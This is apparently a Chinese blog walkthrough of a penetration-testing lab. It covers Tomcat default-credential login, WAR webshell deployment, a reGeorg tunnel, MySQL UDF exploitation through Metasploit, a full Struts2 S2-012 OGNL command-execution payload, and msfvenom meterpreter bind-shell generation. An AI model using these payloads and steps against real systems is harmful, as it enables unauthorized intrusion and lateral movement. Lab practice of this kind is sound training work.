前两天朋友分享了一个实验靶场,感觉环境还不错,于是对测试过程进行了详细记录,靶场中涉及知识点总结如下:


  • War包制作
  • regeorg内网代理工具的使用
  • UDF漏洞利用
  • Struts2-012漏洞利用
  • Msfvenom模块的使用



本次实验靶场的网络拓扑结构如下图所示:

记一次综合实验靶场练习_tomcat



01


获取web据点



首先访问朋友给定的web服务器端口,为tomcat应用的默认页面,如下图所示:


记一次综合实验靶场练习_tomcat_02


如果刚开始没有思路的话,可以百度搜索一下Tomcat示例页面相关漏洞情况。访问目标manager后台目录,尝试tomcat默认口令tomcat/tomcat进行登录:



记一次综合实验靶场练习_tomcat_03


登录成功之后,tomcat管理后台有个部署war包的功能,可以通过上传war包getshell,获取服务器权限。


记一次综合实验靶场练习_服务器_04


在攻击机kali中生成war包后门,可以用自己的木马,也可使用kali自带webshell,默认路径:/usr/share/laudanum/

jar cvf shell.war xx.jsp


记一次综合实验靶场练习_服务器_05

在WAR file to deploy 功能处上传并部署后门war包,单击选择文件,选择生成的war文件并确定,点击击deploy按钮就完成了上传。验证是否上传成功,浏览器访问注意事项:根目录+war包文件名+jsp webshell文件名比如我上传了的war包名为cmd.war,木马名为:cmd.jsp在浏览器地址栏中:hxxp://x.x.x.x/cmd/cmd.jsp     


记一次综合实验靶场练习_服务器_06


接下是连接上传的jsp一句话,使用C刀连接目标服务器的jsp木马下载地址:https://github.com/Chora10/Cknife  可自行编译或者下载网上的程序虚拟机里执行。


记一次综合实验靶场练习_服务器_07


菜刀成功连接后,会以树状形式显示webshell文件所处位置,如下图所示


记一次综合实验靶场练习_服务器_08


记一次综合实验靶场练习_tomcat_09



02


添加代理



拿下web边界机以后,一般情况下,分两种情况:

  • 有内网:以此为跳板,攻击内网其他机器,摸清目标内网拓扑环境,拿下靶标系统;
  • 无内网:如果是项目,就可以收工了,不是的话,就可以作为代理池的一部分;


下面的情况属于有内网的环境,查看本机IP地址,发现两个网卡都有内网地址。

记一次综合实验靶场练习_war包_10


目标web服务器并无探测主机存活的工具,两种方式:


  • 自己上传端口扫描工具||脚本
  • 使用隧道代理工具,代理自己的工具进入目标内网中,做初步的信息搜集。


此处选择第二种方式,上传regeorg程序的tunnel.jsp脚本到目标服务器的shell目录下


记一次综合实验靶场练习_war包_11


web访问返回连接成功的信息(Georg says,’All seems fine’)   如下图所示,此为该工具流量硬特征,建议在下载后修改该字符串,或者使用升级版的neo-regeorg

https://github.com/L-codes/Neo-reGeorg      去特征且传输加密


记一次综合实验靶场练习_内网_12

使用regeorg工具建立隧道,命令如下:

Python regeorgsocksproxy.py -u   hxxp://x.x.x.x/tunnel.jsp -p xxxx

-u 代理木马链接;

-p指定传输端口;


记一次综合实验靶场练习_服务器_13


在proxychains工具配置文件下添加regeorg打通的代理端口vim /etc/proxychains.conf        在最后一行添加regeorg的配置好的传输端口即可


记一次综合实验靶场练习_内网_14


代理nmap到内网扫描172网段敏感端口,使用TCP全连接扫描一些Nmap使用语法:http://mang0.me/archis/40a439a4/


记一次综合实验靶场练习_上传_15



03


UDF漏洞利用



通过扫描得到的MySQL应用信息,尝试弱口令连接,一样的思路哪个应用不会搜索哪里


记一次综合实验靶场练习_服务器_16



查看security_file_priv是否配置命令:

show variables like '%secure%';

显示结果对应解释







Secure_file_priv=null               //不允许导入导出文件Secure_file_priv='D:/'  //允许导入到指定目录Secure_file_priv=‘’               //允许到任意目录Secure_file_priv=”/”              //允许到根目录


记一次综合实验靶场练习_tomcat_17


发现为空可以写任意目录,使用proxychains将msf代理到目标内网中,利用MySQL的UDF漏洞进行命令执行。


记一次综合实验靶场练习_内网_18


如果忘记模块,可以先search 需要的模块内容关键字

Use exploit/multi/mysql/mysql_udf_payload

查看未设置的参数   show  options


Password和rhost参数可以设置   

      

记一次综合实验靶场练习_内网_19





Set rhost 172.16.15.16Set password 123456  run


记一次综合实验靶场练习_内网_20


虽然显示没有会话,但是so文件已经传上去了,使用默认的MySQL命令连接,执行自定义函数,成功执行,说明udf提权成功。


记一次综合实验靶场练习_服务器_21



04


S2-012漏洞利用



代理nmap到内网扫描10网段机器敏感端口


记一次综合实验靶场练习_内网_22


发现10.10.60.250:8080存在struts2-012漏洞


记一次综合实验靶场练习_war包_23


Struts2-012 payload 测试



%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls","-al"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.io.InputStreamReader(#b), #d=new java.io.BufferedReader(#c), #e=new char[50000], #d.read(#e), #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), #f.getWriter().println(new java.lang.String(#e)), #f.getWriter().flush(),#f.getWriter().close() }


成功读取/etc/passwd文件


记一次综合实验靶场练习_war包_24


10.10.60.66和172.16.15.16一样的思路。


记一次综合实验靶场练习_服务器_25


弱口令:admin/password


记一次综合实验靶场练习_服务器_26


记一次综合实验靶场练习_tomcat_27


上传菜刀的jsp木马


记一次综合实验靶场练习_tomcat_28


使用蚁剑服务器管理工具连接成功


记一次综合实验靶场练习_tomcat_29



Msf生成Linux木马


msfvenom -p linux/x86/meterpreter/bind_tcp rhost=10.10.60.66 lport=1234 -f elf > shell.elf


记一次综合实验靶场练习_服务器_30


生成完成后将该木马程序上传到目标服务器的web目录下,赋予权限,在msf中开启监听模块,执行程序,即可拿到会话设置msf下handler模块必要的参数





set payload linux/x86/meterpreter/bing_tcpSet rhost 10.10.60.66Set lport 1234

记一次综合实验靶场练习_tomcat_31






exploit -j        后台获取会话Sessions          可查看会话  -i                进入该会话


记一次综合实验靶场练习_服务器_32


本次实验到此结束,通过弱口令并结合应用特性拿到主机权限,使用内网代理工具建立隧道,探测内网段端口及对应漏洞,拿下对应主机权限。最后如果觉得对自己有帮忙的,关注一手,谢谢师傅们阅读。





- END -



记一次综合实验靶场练习_war包_33